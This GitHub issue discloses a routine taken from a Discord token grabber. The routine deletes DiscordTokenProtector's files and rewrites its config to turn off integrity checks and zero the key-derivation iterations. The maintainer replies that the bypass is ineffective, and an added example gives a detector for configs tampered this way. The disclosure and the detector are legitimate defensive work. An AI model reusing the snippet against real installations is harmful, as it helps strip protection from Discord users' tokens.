
Bypass found in the wild

Open · CanadaHonk opened this issue 3 years ago · 1 comment

```javascript
// Method of a grabber's class; `client` is that grabber's own runtime object
// (fs/util wrappers and an encrypted config), not defined here.
bypass_token_protector() {
    // Remove DTP's binaries and data file from %LOCALAPPDATA% if present.
    for (const file of ["DiscordTokenProtector.exe", "ProtectionPayload.dll", "secure.dat"]) {
        if (client.requires.fs.exists(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\${file}`)) {
            client.requires.fs.rm(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\${file}`);
        }
    }
    // Read DTP's config.json, switch off autostart and every integrity check,
    // and zero the KDF iteration counts and version field.
    const token_protector_config = JSON.parse(client.requires.fs.readFileSync(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\DiscordTokenProtector\\config.json`, {
        encoding: "utf-8"
    }));
    token_protector_config['auto_start'] = false;
    token_protector_config['auto_start_discord'] = false;
    token_protector_config['integrity'] = false;
    token_protector_config['integrity_allowbetterdiscord'] = false;
    token_protector_config['integrity_checkexecutable'] = false;
    token_protector_config['integrity_checkhash'] = false;
    token_protector_config['integrity_checkmodule'] = false;
    token_protector_config['integrity_checkscripts'] = false;
    token_protector_config['integrity_checkresource'] = false;
    token_protector_config['integrity_redownloadhashes'] = false;
    token_protector_config['iterations_iv'] = 0;
    token_protector_config['iterations_key'] = 0;
    token_protector_config['version'] = 0;
    // Write the modified config back in place.
    client.requires.fs.writeFileSync(
        `${client.utils.encryption.decryptData(client.config.user.localappdata)}\\DiscordTokenProtector\\config.json`,
        JSON.stringify(
            token_protector_config,
            null, 4
        )
    );
}
```

GLHF

CanadaHonk avatar Oct 02 '22 20:10 CanadaHonk

I've seen similar "bypasses" in the wild. Overall (including this one), they only work if:

  • DTP is not running, and in this case, they can only get the token through social engineering (making you relogin without DTP). The config changes are useless as these critical configs have been moved to the encrypted container.
  • They run using admin privilege. If you allow a program to run using admin privilege you can safely assume that your token can be easily compromised. DTP cannot block attacks with admin privilege since it is in user land.

In this case, the config change, even if successful, won't do anything.

TL;DR: useless bypass that won't do much.

andro2157 avatar Oct 03 '22 16:10 andro2157
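Added example, not code from this issue or from the DTP project: a small check that tells whether a `config.json` has been rewritten the way the snippet in this issue does it, using the key names from that snippet. The `inspectConfig` helper and the "healthy" sample values are constructed for this example; it makes no claim about DTP's real defaults or about whether those keys still matter once moved into the encrypted container, as andro2157 describes.

```javascript
// Added defensive example, not code from the issue or the DTP project: flag a
// DiscordTokenProtector config.json carrying the tamper pattern from the issue
// (every integrity_* switch forced off, KDF iteration counts zeroed). Key names
// come from the snippet; the "healthy" sample values are constructed.

const FLAGS_FORCED_OFF = [
  "auto_start", "auto_start_discord", "integrity",
  "integrity_allowbetterdiscord", "integrity_checkexecutable",
  "integrity_checkhash", "integrity_checkmodule", "integrity_checkscripts",
  "integrity_checkresource", "integrity_redownloadhashes",
];
const COUNTERS_ZEROED = ["iterations_iv", "iterations_key", "version"];

// Returns { tampered, findings }. Tampered when a KDF iteration count is 0
// (never valid) or every integrity_* switch is off at once, which is the
// grabber's fingerprint rather than a plausible user choice.
function inspectConfig(jsonText) {
  let cfg;
  try {
    cfg = JSON.parse(jsonText);
  } catch (err) {
    return { tampered: false, findings: [`unparseable config: ${err.message}`] };
  }
  const findings = [];
  for (const key of FLAGS_FORCED_OFF) {
    if (cfg[key] === false) findings.push(`${key}=false`);
  }
  for (const key of COUNTERS_ZEROED) {
    if (cfg[key] === 0) findings.push(`${key}=0`);
  }
  const kdfZeroed = cfg.iterations_iv === 0 || cfg.iterations_key === 0;
  const integrityKeys = FLAGS_FORCED_OFF.filter((k) => k.startsWith("integrity"));
  const allIntegrityOff = integrityKeys.every((k) => cfg[k] === false);
  return { tampered: kdfZeroed || allIntegrityOff, findings };
}

// Constructed samples: an untouched config and the same file after the bypass
// routine above has rewritten it.
const HEALTHY_CONFIG = JSON.stringify({
  auto_start: true, auto_start_discord: true, integrity: true,
  integrity_allowbetterdiscord: false, integrity_checkexecutable: true,
  integrity_checkhash: true, integrity_checkmodule: true,
  integrity_checkscripts: true, integrity_checkresource: true,
  integrity_redownloadhashes: true, iterations_iv: 100000,
  iterations_key: 100000, version: 1,
});
const TAMPERED_CONFIG = JSON.stringify(Object.fromEntries([
  ...FLAGS_FORCED_OFF.map((k) => [k, false]),
  ...COUNTERS_ZEROED.map((k) => [k, 0]),
]));
```

A single flag turned off (the healthy sample has `integrity_allowbetterdiscord` off) is reported as a finding but does not trip the verdict; only the full pattern or a zeroed iteration count does.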